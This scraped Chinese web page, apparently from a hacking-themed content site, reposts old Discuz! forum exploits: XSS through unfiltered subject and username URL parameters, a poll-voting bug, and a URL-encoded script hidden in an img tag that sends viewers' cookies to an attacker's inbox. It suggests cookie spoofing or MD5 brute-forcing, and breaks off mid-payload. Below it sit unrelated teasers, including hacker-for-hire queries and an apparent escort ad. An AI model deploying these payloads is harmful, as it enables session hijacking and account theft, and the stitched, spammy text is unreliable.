每日好文
攻防实验室的是这个论坛,于是找了一下资料,贴在这里============在discuz!的发贴、回贴、PM等中的subject都没有经过过滤,所以也可以添加代码。 例如 http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22 效果是首先弹出自己的cookie 利用 *** :把上述代码放置到img中。 适用版本:discuz!2.x discuz!3.x 一种利用discuz!2.0漏洞进行欺骗获得cookie的尝试 通过测试XXXFan论坛的PM功能存在一个安全漏洞,具体描述如下: XXXFan的给某个会员发送悄悄的链接如下(假定这个会员名字为XXXFan) http://XXX/pm.php?action=send&username=XXXFan 因为论坛程序对会员名字没有进行过滤,而是直接显示在发送到栏目中(TO:),所以可以在名字后面加上script代码。例如 http://XXX/pm.php?action=send&username=XXXFan ">里的内容加密,以进一步增加隐蔽性。 至于得到cookie如何做,可以尝试cookie欺骗或者是暴力破解MD5密码 本 *** 适用于大部分使用discuz2.0的论坛,至于discuz3.0的利用 *** 请参与在我以前发表的discuz!悄悄话漏洞 【BUG】Discuz!投票的BUG 投票可以用 misc.php?action=votepoll&fid=2&tid=16980&pollanswers[]=n (n为选项,从0开始) 的方式通过URL来直接投票 但是如果n>更大选项呢,嘻嘻~ 照样提交成功,不过增加了一个标题为空的选项 效果见: http://discuz.net/viewthread.php?tid=20020&sid=dymPEc (那个最后的空白的是我刚加的) 该漏洞存在的版本: Discuz!3.X Discuz!2.X(可能,没有测试过) Discuz!的代码漏洞 这是接着昨天发现的漏洞所展开的,之一发现者(PK0909)。 具体的描述就不说了,下面是一个简单的测试代码。 http://www.xxxx.net/phpbbs/post.php?action...%3C%2Fscript%3E 上面的代码是显示出自己的cookie 下面是在某个比较有名的论坛的测试代码,无论谁察看该网页都会把cookie送到指定的会员短信箱里,隐蔽性很好,就是如果有人引用你的贴,哈哈~这里都会跑出来,露馅了 [ img]http://pic.seo-6.com/Pupian/112020/mfy2j0sfl15-yseo_com.gif%22%20style=display:none%3e%3c/img%3e%3cscript%3evar%20Req=new%20ActiveXObject(%22MSXML2.XMLHTTP%22);Req.open(%22post%22,%22http://www.XXXX.com/forum/pm.php?action=send%22,false);var%20forms=%22pmSubmit=Submit%22.toLowerCas
不能说的xs
微信信息同步器(微信如何同步聊天记录吗)现在微信加好友,一定得加备注了,一打开通讯录,光叫 Alice 的就有5个~ 对于一些总喜欢在朋友圈晒包、晒首饰、晒 Party 的 Social Que...
黑客找漏洞思路相关问题 谁有黑客qq不收费的相关问题 黑客入侵摄像头怎么办 用手机怎么控制别人QQ(用手机qq远程控制电脑)...
“91商务接待系列产品女学妹-【张忠娇】” 名字:李学一:加微信好友,找模特经纪人。 二:留订金500-1000,告之预约的地址,喜欢的类型。 ??饖?欢的人,资询是不是有时间。 四:碰面识人,是圆桌...
.htaccess文件是运行Apache Web Server的Web服务器的设置文件,对设置和重定向Apache Web Server文件系统很有用。请记着.htaccess文件将接纳隐藏花样。没有...
黑客帮忙找手机定位相关问题 黑客价格划分相关问题 怎么知道你的手机是否被黑客控制过 2011黑客ko是谁(adamts13是什么)...
太阳镜又叫墨镜,不仅是用来耍酷,也是用来遮挡强光,可以强光下保护眼睛,可以有效阻挡紫外线和红外线,同时外界环境的颜色并不改变,只有光线强度改变,好像阴天一样,有凉爽舒适的感觉。那么,太阳镜什么牌子好呢...